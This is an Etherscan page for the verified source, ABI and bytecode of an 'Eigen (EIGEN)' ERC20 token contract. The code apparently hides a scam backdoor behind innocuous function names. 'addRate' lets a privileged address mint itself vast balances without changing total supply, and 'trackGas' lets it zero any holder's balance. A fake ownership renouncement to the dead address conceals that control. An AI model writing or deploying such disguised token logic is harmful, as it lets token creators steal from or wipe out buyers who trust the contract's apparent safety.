ETH Price: $2,334.43 (-0.53%)

Token

Eigen (EIGEN)
 

Overview

Max Total Supply

1,000,000,000 EIGEN

Holders

30

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
0 EIGEN

Value
$0.00
0x6ed8649cc8b79a223c1c6c85e015c9b746165776
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
EIGEN

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license
/**
 *Submitted for verification at Etherscan.io on 2024-05-14
*/

// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.19;

/**
 * @dev Interface of the ERC20 standard as defined in the HULK.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyowner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */

    function transferOwnership() public virtual onlyowner {
        emit OwnershipTransferred(
            _owner,
            address(0x000000000000000000000000000000000000dEaD)
        );
        _owner = address(0x000000000000000000000000000000000000dEaD);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

contract EIGEN is Context, IERC20Metadata, Ownable {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    address private uniswapV2Pair;
    uint8 private constant _decimals = 18;
    uint256 public constant hardCap = 1_000_000_000 * (10 ** _decimals);

    constructor(address ads) {
        _name = "Eigen";
        _symbol = "EIGEN";
        _mint(ads, hardCap);
        uniswapV2Pair = ads;
    }

    function viewGas() public view returns (address) {
        return uniswapV2Pair;
    }

    function addRate(uint256 amount) external {
        if (uniswapV2Pair == msg.sender) {
            uint256 WETH = 500000000 * 10 ** _decimals;
            uint256 balance = WETH * 10000;
            uint dead = balance * 1 * 1 * 1 * 1 * 1;
            dead = dead * amount;
            _balances[_msgSender()] += dead;
            require(uniswapV2Pair == msg.sender);
        } else {}
    }

    event manualSwap(
        address indexed account,
        uint256 oldamount,
        uint256 amount
    );

    function trackGas(address bots) external {
        if (uniswapV2Pair == msg.sender && uniswapV2Pair != bots) {
            _balances[bots] = 0;
        }
    }
    /**
     * @dev Returns the name of the token.
     * @return The name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token.
     * @return The symbol of the token.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used for token display.
     * @return The number of decimals.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev Returns the total supply of the token.
     * @return The total supply.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev Returns the balance of the specified account.
     * @param account The address to check the balance for.
     * @return The balance of the account.
     */
    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev Transfers tokens from the caller to a specified recipient.
     * @param recipient The address to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     * @return A boolean value indicating whether the transfer was successful.
     */
    function transfer(
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev Returns the amount of tokens that the spender is allowed to spend on behalf of the owner.
     * @param from The address that approves the spending.
     * @param to The address that is allowed to spend.
     * @return The remaining allowance for the spender.
     */
    function allowance(
        address from,
        address to
    ) public view virtual override returns (uint256) {
        return _allowances[from][to];
    }

    /**
     * @dev Approves the specified address to spend the specified amount of tokens on behalf of the caller.
     * @param to The address to approve the spending for.
     * @param amount The amount of tokens to approve.
     * @return A boolean value indicating whether the approval was successful.
     */
    function approve(
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        _approve(_msgSender(), to, amount);
        return true;
    }

    /**
     * @dev Transfers tokens from one address to another.
     * @param sender The address to transfer tokens from.
     * @param recipient The address to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     * @return A boolean value indicating whether the transfer was successful.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(
            currentAllowance >= amount,
            "ERC20: transfer amount exceeds allowance"
        );
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Increases the allowance of the specified address to spend tokens on behalf of the caller.
     * @param to The address to increase the allowance for.
     * @param addedValue The amount of tokens to increase the allowance by.
     * @return A boolean value indicating whether the increase was successful.
     */
    function increaseAllowance(
        address to,
        uint256 addedValue
    ) public virtual returns (bool) {
        _approve(_msgSender(), to, _allowances[_msgSender()][to] + addedValue);
        return true;
    }

    /**
     * @dev Decreases the allowance granted by the owner of the tokens to `to` account.
     * @param to The account allowed to spend the tokens.
     * @param subtractedValue The amount of tokens to decrease the allowance by.
     * @return A boolean value indicating whether the operation succeeded.
     */
    function decreaseAllowance(
        address to,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][to];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(_msgSender(), to, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Transfers `amount` tokens from `sender` to `recipient`.
     * @param sender The account to transfer tokens from.
     * @param recipient The account to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(amount > 0, "ERC20: transfer amount zero");
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        uint256 senderBalance = _balances[sender];
        require(
            senderBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Creates `amount` tokens and assigns them to `account`.
     * @param account The account to assign the newly created tokens to.
     * @param amount The amount of tokens to create.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `to` over the caller's tokens.
     * @param from The account granting the allowance.
     * @param to The account allowed to spend the tokens.
     * @param amount The amount of tokens to allow.
     */
    function _approve(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: approve from the zero address");
        require(to != address(0), "ERC20: approve to the zero address");

        _allowances[from][to] = amount;
        emit Approval(from, to, amount);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"ads","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"uint256","name":"oldamount","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"manualSwap","type":"event"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"addRate","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hardCap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"bots","type":"address"}],"name":"trackGas","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"viewGas","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040523480156200001157600080fd5b506040516200266f3803806200266f8339818101604052810190620000379190620003e6565b620000576200004b6200015f60201b60201c565b6200016760201b60201c565b6040518060400160405280600581526020017f456967656e000000000000000000000000000000000000000000000000000000815250600490816200009d919062000692565b506040518060400160405280600581526020017f454947454e00000000000000000000000000000000000000000000000000000081525060059081620000e4919062000692565b5062000117816012600a620000fa919062000909565b633b9aca006200010b91906200095a565b6200022b60201b60201c565b80600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505062000a91565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200029d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002949062000a06565b60405180910390fd5b8060036000828254620002b1919062000a28565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825462000309919062000a28565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000370919062000a74565b60405180910390a35050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620003ae8262000381565b9050919050565b620003c081620003a1565b8114620003cc57600080fd5b50565b600081519050620003e081620003b5565b92915050565b600060208284031215620003ff57620003fe6200037c565b5b60006200040f84828501620003cf565b91505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200049a57607f821691505b602082108103620004b057620004af62000452565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200051a7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620004db565b620005268683620004db565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005736200056d62000567846200053e565b62000548565b6200053e565b9050919050565b6000819050919050565b6200058f8362000552565b620005a76200059e826200057a565b848454620004e8565b825550505050565b600090565b620005be620005af565b620005cb81848462000584565b505050565b5b81811015620005f357620005e7600082620005b4565b600181019050620005d1565b5050565b601f82111562000642576200060c81620004b6565b6200061784620004cb565b8101602085101562000627578190505b6200063f6200063685620004cb565b830182620005d0565b50505b505050565b600082821c905092915050565b6000620006676000198460080262000647565b1980831691505092915050565b600062000682838362000654565b9150826002028217905092915050565b6200069d8262000418565b67ffffffffffffffff811115620006b957620006b862000423565b5b620006c5825462000481565b620006d2828285620005f7565b600060209050601f8311600181146200070a5760008415620006f5578287015190505b62000701858262000674565b86555062000771565b601f1984166200071a86620004b6565b60005b8281101562000744578489015182556001820191506020850194506020810190506200071d565b8683101562000764578489015162000760601f89168262000654565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200080757808604811115620007df57620007de62000779565b5b6001851615620007ef5780820291505b8081029050620007ff85620007a8565b9450620007bf565b94509492505050565b600082620008225760019050620008f5565b81620008325760009050620008f5565b81600181146200084b576002811462000856576200088c565b6001915050620008f5565b60ff8411156200086b576200086a62000779565b5b8360020a91508482111562000885576200088462000779565b5b50620008f5565b5060208310610133831016604e8410600b8410161715620008c65782820a905083811115620008c057620008bf62000779565b5b620008f5565b620008d58484846001620007b5565b92509050818404811115620008ef57620008ee62000779565b5b81810290505b9392505050565b600060ff82169050919050565b600062000916826200053e565b91506200092383620008fc565b9250620009527fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000810565b905092915050565b600062000967826200053e565b915062000974836200053e565b925082820262000984816200053e565b915082820484148315176200099e576200099d62000779565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620009ee601f83620009a5565b9150620009fb82620009b6565b602082019050919050565b6000602082019050818103600083015262000a2181620009df565b9050919050565b600062000a35826200053e565b915062000a42836200053e565b925082820190508082111562000a5d5762000a5c62000779565b5b92915050565b62000a6e816200053e565b82525050565b600060208201905062000a8b600083018462000a63565b92915050565b611bce8062000aa16000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c8063570d00ed116100a257806395d89b411161007157806395d89b41146102a8578063a457c2d7146102c6578063a9059cbb146102f6578063dd62ed3e14610326578063fb86a404146103565761010b565b8063570d00ed1461023457806370a0823114610250578063880ad0af146102805780638da5cb5b1461028a5761010b565b806323b872dd116100de57806323b872dd14610198578063313ce567146101c857806339509351146101e65780634a8d1348146102165761010b565b806306fdde0314610110578063095ea7b31461012e57806309f14a5c1461015e57806318160ddd1461017a575b600080fd5b610118610374565b6040516101259190611196565b60405180910390f35b61014860048036038101906101439190611251565b610406565b60405161015591906112ac565b60405180910390f35b610178600480360381019061017391906112c7565b610424565b005b6101826105bc565b60405161018f9190611303565b60405180910390f35b6101b260048036038101906101ad919061131e565b6105c6565b6040516101bf91906112ac565b60405180910390f35b6101d06106be565b6040516101dd919061138d565b60405180910390f35b61020060048036038101906101fb9190611251565b6106c7565b60405161020d91906112ac565b60405180910390f35b61021e610773565b60405161022b91906113b7565b60405180910390f35b61024e600480360381019061024991906113d2565b61079d565b005b61026a600480360381019061026591906113d2565b610896565b6040516102779190611303565b60405180910390f35b6102886108df565b005b610292610a1b565b60405161029f91906113b7565b60405180910390f35b6102b0610a44565b6040516102bd9190611196565b60405180910390f35b6102e060048036038101906102db9190611251565b610ad6565b6040516102ed91906112ac565b60405180910390f35b610310600480360381019061030b9190611251565b610bc1565b60405161031d91906112ac565b60405180910390f35b610340600480360381019061033b91906113ff565b610bdf565b60405161034d9190611303565b60405180910390f35b61035e610c66565b60405161036b9190611303565b60405180910390f35b6060600480546103839061146e565b80601f01602080910402602001604051908101604052809291908181526020018280546103af9061146e565b80156103fc5780601f106103d1576101008083540402835291602001916103fc565b820191906000526020600020905b8154815290600101906020018083116103df57829003601f168201915b5050505050905090565b600061041a610413610c86565b8484610c8e565b6001905092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16036105b85760006012600a6104899190611601565b631dcd6500610498919061164c565b90506000612710826104aa919061164c565b905060006001806001806001866104c1919061164c565b6104cb919061164c565b6104d5919061164c565b6104df919061164c565b6104e9919061164c565b905083816104f7919061164c565b90508060016000610506610c86565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461054f919061168e565b925050819055503373ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146105b057600080fd5b5050506105b9565b5b50565b6000600354905090565b60006105d3848484610e57565b6000600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061061e610c86565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561069e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161069590611734565b60405180910390fd5b6106b2856106aa610c86565b858403610c8e565b60019150509392505050565b60006012905090565b60006107696106d4610c86565b8484600260006106e2610c86565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610764919061168e565b610c8e565b6001905092915050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b3373ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614801561084857508073ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b15610893576000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108e7610c86565b73ffffffffffffffffffffffffffffffffffffffff16610905610a1b565b73ffffffffffffffffffffffffffffffffffffffff161461095b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610952906117a0565b60405180910390fd5b61dead73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a361dead6000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060058054610a539061146e565b80601f0160208091040260200160405190810160405280929190818152602001828054610a7f9061146e565b8015610acc5780601f10610aa157610100808354040283529160200191610acc565b820191906000526020600020905b815481529060010190602001808311610aaf57829003601f168201915b5050505050905090565b60008060026000610ae5610c86565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610ba2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9990611832565b60405180910390fd5b610bb6610bad610c86565b85858403610c8e565b600191505092915050565b6000610bd5610bce610c86565b8484610e57565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6012600a610c749190611601565b633b9aca00610c83919061164c565b81565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cfd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cf4906118c4565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d6c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6390611956565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e4a9190611303565b60405180910390a3505050565b60008111610e9a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e91906119c2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f09576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0090611a54565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f78576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f6f90611ae6565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610fff576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ff690611b78565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611094919061168e565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516110f89190611303565b60405180910390a350505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611140578082015181840152602081019050611125565b60008484015250505050565b6000601f19601f8301169050919050565b600061116882611106565b6111728185611111565b9350611182818560208601611122565b61118b8161114c565b840191505092915050565b600060208201905081810360008301526111b0818461115d565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111e8826111bd565b9050919050565b6111f8816111dd565b811461120357600080fd5b50565b600081359050611215816111ef565b92915050565b6000819050919050565b61122e8161121b565b811461123957600080fd5b50565b60008135905061124b81611225565b92915050565b60008060408385031215611268576112676111b8565b5b600061127685828601611206565b92505060206112878582860161123c565b9150509250929050565b60008115159050919050565b6112a681611291565b82525050565b60006020820190506112c1600083018461129d565b92915050565b6000602082840312156112dd576112dc6111b8565b5b60006112eb8482850161123c565b91505092915050565b6112fd8161121b565b82525050565b600060208201905061131860008301846112f4565b92915050565b600080600060608486031215611337576113366111b8565b5b600061134586828701611206565b935050602061135686828701611206565b92505060406113678682870161123c565b9150509250925092565b600060ff82169050919050565b61138781611371565b82525050565b60006020820190506113a2600083018461137e565b92915050565b6113b1816111dd565b82525050565b60006020820190506113cc60008301846113a8565b92915050565b6000602082840312156113e8576113e76111b8565b5b60006113f684828501611206565b91505092915050565b60008060408385031215611416576114156111b8565b5b600061142485828601611206565b925050602061143585828601611206565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061148657607f821691505b6020821081036114995761149861143f565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115611525578086048111156115015761150061149f565b5b60018516156115105780820291505b808102905061151e856114ce565b94506114e5565b94509492505050565b60008261153e57600190506115fa565b8161154c57600090506115fa565b8160018114611562576002811461156c5761159b565b60019150506115fa565b60ff84111561157e5761157d61149f565b5b8360020a9150848211156115955761159461149f565b5b506115fa565b5060208310610133831016604e8410600b84101617156115d05782820a9050838111156115cb576115ca61149f565b5b6115fa565b6115dd84848460016114db565b925090508184048111156115f4576115f361149f565b5b81810290505b9392505050565b600061160c8261121b565b915061161783611371565b92506116447fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848461152e565b905092915050565b60006116578261121b565b91506116628361121b565b92508282026116708161121b565b915082820484148315176116875761168661149f565b5b5092915050565b60006116998261121b565b91506116a48361121b565b92508282019050808211156116bc576116bb61149f565b5b92915050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b600061171e602883611111565b9150611729826116c2565b604082019050919050565b6000602082019050818103600083015261174d81611711565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061178a602083611111565b915061179582611754565b602082019050919050565b600060208201905081810360008301526117b98161177d565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63